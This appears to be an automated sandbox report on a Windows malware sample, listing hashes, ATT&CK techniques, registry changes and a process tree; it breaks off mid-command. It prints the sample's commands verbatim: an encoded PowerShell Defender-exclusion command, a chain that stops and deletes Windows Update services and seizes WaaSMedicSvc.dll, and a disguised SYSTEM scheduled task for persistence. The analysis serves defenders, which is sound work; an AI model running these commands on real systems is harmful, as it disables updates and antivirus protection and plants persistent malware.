465b187a795c015825c5a0a1791d1587a90079759b0f418ff5ea6afc44dd68d0

General

Target

465b187a795c015825c5a0a1791d1587a90079759b0f418ff5ea6afc44dd68d0.exe
Size

2.0MB
MD5

79dbc1a54d33366681f1e926d565cad4
SHA1

907cf0ec6784bf140f9759d6931d3697da0fc229
SHA256

465b187a795c015825c5a0a1791d1587a90079759b0f418ff5ea6afc44dd68d0
SHA512

6d66ae7edc6028e8bc1eac9caf85f5d2d38a6c000e5fa907c9eec5786b225aeeb7c0b565bee9aa7b09f6f792d0857e3d06f0e3ed832d73047506a18ce15371dd

Score

10^/10

discovery evasion exploit

Malware Config

Signatures

Modifies security service 2 TTPs 5 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo	reg.exe

Executes dropped EXE 1 IoCs

Processes:

services.exe

pid process

4352 services.exe
Possible privilege escalation attempt 4 IoCs
exploit

Processes:

takeown.exeicacls.exetakeown.exeicacls.exe

pid process

3692 takeown.exe
4484 icacls.exe
3472 takeown.exe
4848 icacls.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489
Modifies file permissions 1 TTPs 4 IoCs
discovery

File Permissions Modification
T1222

Processes:

takeown.exeicacls.exetakeown.exeicacls.exe

pid process

3692 takeown.exe
4484 icacls.exe
3472 takeown.exe
4848 icacls.exe

pid	process
4352	services.exe

pid	process
3692	takeown.exe
4484	icacls.exe
3472	takeown.exe
4848	icacls.exe

pid	process
3692	takeown.exe
4484	icacls.exe
3472	takeown.exe
4848	icacls.exe

Drops file in System32 directory 3 IoCs

Processes:

powershell.execonhost.exe

description	ioc	process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log	conhost.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

conhost.exe

description pid process target process

PID 3460 set thread context of 4844 3460 conhost.exe conhost.exe

description	pid	process	target process
PID 3460 set thread context of 4844	3460	conhost.exe	conhost.exe

Drops file in Program Files directory 2 IoCs

Processes:

conhost.exe

description	ioc	process
File created	C:\Program Files\Windows\services.exe	conhost.exe
File opened for modification	C:\Program Files\Windows\services.exe	conhost.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

4896 schtasks.exe

pid	process
4896	schtasks.exe

Modifies data under HKEY_USERS 52 IoCs

Processes:

powershell.execonhost.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	conhost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	conhost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	conhost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	conhost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	conhost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe

Modifies registry key 1 TTPs 18 IoCs

Modify Registry

T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

pid	process
4776	reg.exe
4952	reg.exe
5068	reg.exe
5064	reg.exe
4580	reg.exe
3348	reg.exe
5020	reg.exe
1012	reg.exe
4320	reg.exe
3172	reg.exe
4740	reg.exe
4508	reg.exe
2900	reg.exe
1804	reg.exe
2160	reg.exe
4948	reg.exe
2136	reg.exe
4032	reg.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

Processes:

powershell.execonhost.exepowershell.execonhost.exe

pid process

4736 powershell.exe
4736 powershell.exe
4736 powershell.exe
4700 conhost.exe
1088 powershell.exe
1088 powershell.exe
1088 powershell.exe
3460 conhost.exe

pid	process
4736	powershell.exe
4736	powershell.exe
4736	powershell.exe
4700	conhost.exe
1088	powershell.exe
1088	powershell.exe
1088	powershell.exe
3460	conhost.exe

Suspicious use of AdjustPrivilegeToken 39 IoCs

Processes:

powershell.execonhost.exetakeown.exepowershell.execonhost.exetakeown.exe

description	pid	process
Token: SeDebugPrivilege	4736	powershell.exe
Token: SeIncreaseQuotaPrivilege	4736	powershell.exe
Token: SeSecurityPrivilege	4736	powershell.exe
Token: SeTakeOwnershipPrivilege	4736	powershell.exe
Token: SeLoadDriverPrivilege	4736	powershell.exe
Token: SeSystemProfilePrivilege	4736	powershell.exe
Token: SeSystemtimePrivilege	4736	powershell.exe
Token: SeProfSingleProcessPrivilege	4736	powershell.exe
Token: SeIncBasePriorityPrivilege	4736	powershell.exe
Token: SeCreatePagefilePrivilege	4736	powershell.exe
Token: SeBackupPrivilege	4736	powershell.exe
Token: SeRestorePrivilege	4736	powershell.exe
Token: SeShutdownPrivilege	4736	powershell.exe
Token: SeDebugPrivilege	4736	powershell.exe
Token: SeSystemEnvironmentPrivilege	4736	powershell.exe
Token: SeRemoteShutdownPrivilege	4736	powershell.exe
Token: SeUndockPrivilege	4736	powershell.exe
Token: SeManageVolumePrivilege	4736	powershell.exe
Token: 33	4736	powershell.exe
Token: 34	4736	powershell.exe
Token: 35	4736	powershell.exe
Token: 36	4736	powershell.exe
Token: SeDebugPrivilege	4700	conhost.exe
Token: SeTakeOwnershipPrivilege	3692	takeown.exe
Token: SeDebugPrivilege	1088	powershell.exe
Token: SeAssignPrimaryTokenPrivilege	1088	powershell.exe
Token: SeIncreaseQuotaPrivilege	1088	powershell.exe
Token: SeSecurityPrivilege	1088	powershell.exe
Token: SeTakeOwnershipPrivilege	1088	powershell.exe
Token: SeLoadDriverPrivilege	1088	powershell.exe
Token: SeSystemtimePrivilege	1088	powershell.exe
Token: SeBackupPrivilege	1088	powershell.exe
Token: SeRestorePrivilege	1088	powershell.exe
Token: SeShutdownPrivilege	1088	powershell.exe
Token: SeSystemEnvironmentPrivilege	1088	powershell.exe
Token: SeUndockPrivilege	1088	powershell.exe
Token: SeManageVolumePrivilege	1088	powershell.exe
Token: SeDebugPrivilege	3460	conhost.exe
Token: SeTakeOwnershipPrivilege	3472	takeown.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

465b187a795c015825c5a0a1791d1587a90079759b0f418ff5ea6afc44dd68d0.execonhost.execmd.execmd.execmd.execmd.exeservices.exe

description	pid	process	target process
PID 4016 wrote to memory of 4700	4016	465b187a795c015825c5a0a1791d1587a90079759b0f418ff5ea6afc44dd68d0.exe	conhost.exe
PID 4016 wrote to memory of 4700	4016	465b187a795c015825c5a0a1791d1587a90079759b0f418ff5ea6afc44dd68d0.exe	conhost.exe
PID 4016 wrote to memory of 4700	4016	465b187a795c015825c5a0a1791d1587a90079759b0f418ff5ea6afc44dd68d0.exe	conhost.exe
PID 4700 wrote to memory of 2952	4700	conhost.exe	cmd.exe
PID 4700 wrote to memory of 2952	4700	conhost.exe	cmd.exe
PID 2952 wrote to memory of 4736	2952	cmd.exe	powershell.exe
PID 2952 wrote to memory of 4736	2952	cmd.exe	powershell.exe
PID 4700 wrote to memory of 2784	4700	conhost.exe	cmd.exe
PID 4700 wrote to memory of 2784	4700	conhost.exe	cmd.exe
PID 2784 wrote to memory of 3472	2784	cmd.exe	sc.exe
PID 2784 wrote to memory of 3472	2784	cmd.exe	sc.exe
PID 2784 wrote to memory of 4848	2784	cmd.exe	sc.exe
PID 2784 wrote to memory of 4848	2784	cmd.exe	sc.exe
PID 2784 wrote to memory of 1648	2784	cmd.exe	sc.exe
PID 2784 wrote to memory of 1648	2784	cmd.exe	sc.exe
PID 2784 wrote to memory of 3052	2784	cmd.exe	sc.exe
PID 2784 wrote to memory of 3052	2784	cmd.exe	sc.exe
PID 2784 wrote to memory of 3456	2784	cmd.exe	sc.exe
PID 2784 wrote to memory of 3456	2784	cmd.exe	sc.exe
PID 2784 wrote to memory of 4776	2784	cmd.exe	reg.exe
PID 2784 wrote to memory of 4776	2784	cmd.exe	reg.exe
PID 2784 wrote to memory of 2160	2784	cmd.exe	reg.exe
PID 2784 wrote to memory of 2160	2784	cmd.exe	reg.exe
PID 2784 wrote to memory of 4948	2784	cmd.exe	reg.exe
PID 2784 wrote to memory of 4948	2784	cmd.exe	reg.exe
PID 2784 wrote to memory of 5064	2784	cmd.exe	reg.exe
PID 2784 wrote to memory of 5064	2784	cmd.exe	reg.exe
PID 2784 wrote to memory of 2136	2784	cmd.exe	reg.exe
PID 2784 wrote to memory of 2136	2784	cmd.exe	reg.exe
PID 2784 wrote to memory of 3692	2784	cmd.exe	takeown.exe
PID 2784 wrote to memory of 3692	2784	cmd.exe	takeown.exe
PID 4700 wrote to memory of 2792	4700	conhost.exe	cmd.exe
PID 4700 wrote to memory of 2792	4700	conhost.exe	cmd.exe
PID 2784 wrote to memory of 4484	2784	cmd.exe	icacls.exe
PID 2784 wrote to memory of 4484	2784	cmd.exe	icacls.exe
PID 2792 wrote to memory of 4896	2792	cmd.exe	schtasks.exe
PID 2792 wrote to memory of 4896	2792	cmd.exe	schtasks.exe
PID 2784 wrote to memory of 4580	2784	cmd.exe	reg.exe
PID 2784 wrote to memory of 4580	2784	cmd.exe	reg.exe
PID 2784 wrote to memory of 3348	2784	cmd.exe	reg.exe
PID 2784 wrote to memory of 3348	2784	cmd.exe	reg.exe
PID 2784 wrote to memory of 3172	2784	cmd.exe	reg.exe
PID 2784 wrote to memory of 3172	2784	cmd.exe	reg.exe
PID 2784 wrote to memory of 5020	2784	cmd.exe	reg.exe
PID 2784 wrote to memory of 5020	2784	cmd.exe	reg.exe
PID 2784 wrote to memory of 5012	2784	cmd.exe	schtasks.exe
PID 2784 wrote to memory of 5012	2784	cmd.exe	schtasks.exe
PID 2784 wrote to memory of 3380	2784	cmd.exe	schtasks.exe
PID 2784 wrote to memory of 3380	2784	cmd.exe	schtasks.exe
PID 2784 wrote to memory of 4932	2784	cmd.exe	schtasks.exe
PID 2784 wrote to memory of 4932	2784	cmd.exe	schtasks.exe
PID 2784 wrote to memory of 4288	2784	cmd.exe	schtasks.exe
PID 2784 wrote to memory of 4288	2784	cmd.exe	schtasks.exe
PID 2784 wrote to memory of 3236	2784	cmd.exe	schtasks.exe
PID 2784 wrote to memory of 3236	2784	cmd.exe	schtasks.exe
PID 2784 wrote to memory of 3476	2784	cmd.exe	schtasks.exe
PID 2784 wrote to memory of 3476	2784	cmd.exe	schtasks.exe
PID 2784 wrote to memory of 4492	2784	cmd.exe	schtasks.exe
PID 2784 wrote to memory of 4492	2784	cmd.exe	schtasks.exe
PID 4700 wrote to memory of 3816	4700	conhost.exe	cmd.exe
PID 4700 wrote to memory of 3816	4700	conhost.exe	cmd.exe
PID 3816 wrote to memory of 4628	3816	cmd.exe	schtasks.exe
PID 3816 wrote to memory of 4628	3816	cmd.exe	schtasks.exe
PID 4352 wrote to memory of 3460	4352	services.exe	conhost.exe

C:\Users\Admin\AppData\Local\Temp\465b187a795c015825c5a0a1791d1587a90079759b0f418ff5ea6afc44dd68d0.exe
"C:\Users\Admin\AppData\Local\Temp\465b187a795c015825c5a0a1791d1587a90079759b0f418ff5ea6afc44dd68d0.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4016

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\465b187a795c015825c5a0a1791d1587a90079759b0f418ff5ea6afc44dd68d0.exe"
2⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4700

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGgAdAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGMAcQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBsAHEAdgBqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHoAaABmACMAPgA="
3⤵
- Suspicious use of WriteProcessMemory
PID:2952

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "PAAjAGgAdAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGMAcQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBsAHEAdgBqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHoAaABmACMAPgA="
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4736

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
3⤵
- Suspicious use of WriteProcessMemory
PID:2784

C:\Windows\system32\sc.exe
sc stop UsoSvc
4⤵
PID:3472

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
4⤵
PID:4848

C:\Windows\system32\sc.exe
sc stop wuauserv
4⤵
PID:1648

C:\Windows\system32\sc.exe
sc stop bits
4⤵
PID:3052

C:\Windows\system32\sc.exe
sc stop dosvc
4⤵
PID:3456

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
4⤵
- Modifies registry key
PID:4776

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
4⤵
- Modifies registry key
PID:2160

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
4⤵
- Modifies security service
- Modifies registry key
PID:4948

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
4⤵
- Modifies registry key
PID:5064

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
4⤵
- Modifies registry key
PID:2136

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3692

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4484

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:4580

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:3348

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:3172

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:5020

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
4⤵
PID:5012

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
4⤵
PID:3380

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
4⤵
PID:4932

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
4⤵
PID:4288

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
4⤵
PID:3236

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
4⤵
PID:3476

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
4⤵
PID:4492

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Program Files\Windows\services.exe"
3⤵
- Suspicious use of WriteProcessMemory
PID:2792

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Program Files\Windows\services.exe"
4⤵
- Creates scheduled task(s)
PID:4896

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c schtasks /run /tn "GoogleUpdateTaskMachineQC"
3⤵
- Suspicious use of WriteProcessMemory
PID:3816

C:\Windows\system32\schtasks.exe
schtasks /run /tn "GoogleUpdateTaskMachineQC"
4⤵
PID:4628

C:\Program Files\Windows\services.exe
"C:\Program Files\Windows\services.exe"
1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4352

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Program Files\Windows\services.exe"
2⤵
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3460

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGgAdAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGMAcQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBsAHEAdgBqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHoAaABmACMAPgA="
3⤵
PID:4656

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "PAAjAGgAdAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGMAcQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBsAHEAdgBqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHoAaABmACMAPgA="
4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1088

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS 